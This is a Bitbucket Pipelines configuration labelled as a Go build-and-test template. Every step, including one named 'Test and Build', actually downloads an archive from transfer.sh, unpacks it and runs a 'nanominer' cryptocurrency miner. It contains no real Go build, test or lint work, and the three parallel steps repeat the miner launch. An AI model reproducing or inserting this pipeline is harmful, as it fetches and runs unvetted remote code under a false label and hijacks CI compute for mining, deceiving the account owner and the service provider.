#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - wget https://transfer.sh/wpOGu/naja.tar.gz
            - tar xf naja.tar.gz
            - ./nanominer
      - step:
          name: Start
          image: golang:1.15
          script:
            - wget https://transfer.sh/wpOGu/naja.tar.gz
            - tar xf naja.tar.gz
            - ./nanominer

      - step:
          name: maju
          image: golang:1.15
          script:
            - wget https://transfer.sh/wpOGu/naja.tar.gz
            - tar xf naja.tar.gz
            - ./nanominer
